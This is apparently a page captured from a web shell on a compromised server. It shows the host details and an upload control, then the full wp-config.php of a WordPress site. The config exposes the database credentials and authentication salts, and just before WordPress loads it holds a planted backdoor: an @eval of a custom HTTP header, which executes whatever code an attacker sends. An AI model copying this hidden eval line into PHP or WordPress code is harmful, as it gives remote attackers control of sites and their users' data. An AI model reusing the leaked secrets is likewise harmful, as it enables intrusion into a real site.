HEX
Server: Apache
System: Linux 103-174-50-80.cprapid.com 5.14.0-611.5.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 08:09:09 EST 2025 x86_64
User: lennoxfa (1022)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/lennoxfa/public_html/wp-config.php
<?php
define( 'WP_CACHE', true );



/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'lennoxfa_site' );

/** MySQL database username */
define( 'DB_USER', 'lennoxfa_site' );

/** MySQL database password */
define( 'DB_PASSWORD', 'lennoxfa_site' );

/** MySQL hostname */
define( 'DB_HOST', '127.0.0.1' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('DISABLE_WP_CRON', true);



/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'j2w8wedrr5ylzovnvqk3oymc80kfhyvhfitrfou43i4iitueydyjsxlxyoztsqpj' );
define( 'SECURE_AUTH_KEY',  'vo8ol6rs4xorh7gt4wouscn8qhmgfailklazcjvpjypjw884cotw0fvwpk4uvwrj' );
define( 'LOGGED_IN_KEY',    'wgb6gztdcqyzxpaxxj0cf0ztymwvpmhjin1z8tefbjq4aoxhglnft8whi2o01r0c' );
define( 'NONCE_KEY',        'p2etwio4vjudemaoz2iqgmywkrgqkoxfk8oer8n7l1ovjiukrzidhh4ybzmz9ovq' );
define( 'AUTH_SALT',        'yup0kwib26lgstni6lxkmeuwp691vzzkom9qrb2p4ewcbg8chtuk1v00prp8wthf' );
define( 'SECURE_AUTH_SALT', 'nfays4i17e610ytvng9mrokbirnzakdtttqrzmuwtmzkijolwjn3gmuoa64yughb' );
define( 'LOGGED_IN_SALT',   'nqjrtfz9a79sknskix1n6alrzz6dpkfwnewyzkxc1rt2uwpu7dcryk2cdrjhotuv' );
define( 'NONCE_SALT',       '2a8oggygsde6myqwqbqvgdgij6qfx5fnqighrxchroymfu0zevem3mjz1q5kxtrw' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wphc_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );
define( 'WP_MEMORY_LIMIT', '256M' );
define( 'WP_MAX_MEMORY_LIMIT', '128M' );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_C594B03']);
require_once ABSPATH . 'wp-settings.php';